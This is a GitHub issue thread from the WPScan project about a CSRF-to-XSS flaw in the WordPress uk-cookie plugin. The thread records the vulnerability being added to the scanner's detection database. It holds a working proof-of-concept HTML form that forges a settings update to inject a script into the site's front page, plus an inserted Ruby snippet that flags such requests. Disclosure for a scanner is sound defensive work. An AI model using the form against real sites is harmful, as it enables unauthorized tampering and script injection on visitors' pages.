CVE-2012-5856 uk-cookie plugin XSS #184

Closed
fgeek opened this Issue May 14, 2013 · 4 comments

Contributor

fgeek commented May 14, 2013

Please add detection for CVE-2012-5856 uk-cookie plugin XSS. More details:

http://osvdb.org/87561
http://seclists.org/bugtraq/2012/Nov/50

Owner

ethicalhack3r commented May 14, 2013

Thanks! I've emailed the Bugtraq poster to see if he can give any further info. From a quick glance there doesn't seem to be anything obvious, but there must have been an issue if WordPress have since removed the plugin from their plugins search.

Code can still be found on WP SVN - http://plugins.svn.wordpress.org/uk-cookie/

Added to WPScan. Hopefully the reporter can point out where the issue is; if not, we can spend some time locating it.

Contributor

fgeek commented Jun 6, 2013

There is a CSRF security vulnerability in uk-cookie plugin version 1.1, and using it an attacker can insert XSS into the front page of a WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

<html>
<body>
<form action="https://example.com/wp-admin/options.php" method="POST">
<input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="&#95;wpnonce" value="e909307b13" />
<input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
<input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
<input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
<input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
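
A defender-side check for the request the form above produces, as an added example that is not part of the original comment, of WPScan or of the plugin: it reviews one captured POST to `options.php` and flags a cross-site source and markup in the `cookiewarn_options` fields. The function names, the heuristic tag regex and the sample requests are assumptions constructed for illustration; only the field names and values come from the form.

```ruby
require 'uri'

# Added illustration, not WPScan or plugin code. Names below are hypothetical.
OPTION_PAGE  = 'cookie_plugin_options'  # option_page value from the form
FIELD_PREFIX = 'cookiewarn_options['    # settings fields from the form
TAG = /<\s*\/?\s*[a-z!][^>]*>/i         # heuristic: anything shaped like an HTML tag

def host_of(url)
  URI.parse(url.to_s).host
rescue URI::InvalidURIError
  nil
end

# Reviews one captured POST to /wp-admin/options.php and returns the reasons
# it resembles a forged update of this plugin's settings (empty if none).
def review_settings_post(host:, origin:, referer:, body:)
  fields = URI.decode_www_form(body)
  return [] unless fields.assoc('option_page')&.last == OPTION_PAGE

  findings = []
  source = host_of(origin) || host_of(referer)
  if source.nil?
    findings << 'no Origin or Referer to confirm a same-site submission'
  elsif !source.casecmp?(host)
    findings << "cross-site submission from #{source}"
  end
  fields.each do |name, value|
    findings << "markup in #{name}" if name.start_with?(FIELD_PREFIX) && value.match?(TAG)
  end
  findings
end

# Constructed sample bodies; field names and values mirror the form above.
FORGED = URI.encode_www_form(
  'option_page' => OPTION_PAGE, 'action' => 'update',
  'cookiewarn_options[warn_text]' => "<script>alert('hacked')</script>",
  'cookiewarn_options[redirect]' => 'https://github.com/wpscanteam/wpscan/',
  'cookiewarn_options[ok_text]' => 'Yes', 'cookiewarn_options[notok_text]' => 'No'
)
BENIGN = URI.encode_www_form(
  'option_page' => OPTION_PAGE, 'action' => 'update',
  'cookiewarn_options[warn_text]' => 'This site uses cookies.',
  'cookiewarn_options[ok_text]' => 'Yes', 'cookiewarn_options[notok_text]' => 'No'
)

if __FILE__ == $PROGRAM_NAME
  puts review_settings_post(host: 'example.com', origin: 'https://other.invalid',
                            referer: nil, body: FORGED)
end
```
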
Owner

erwanlr commented Jun 14, 2013

CSRF added yesterday: 24e039c#L0R4477

erwanlr closed this Jun 14, 2013

Contributor

fgeek commented Jun 14, 2013

Please add CVE-2013-2180 to title, thanks.
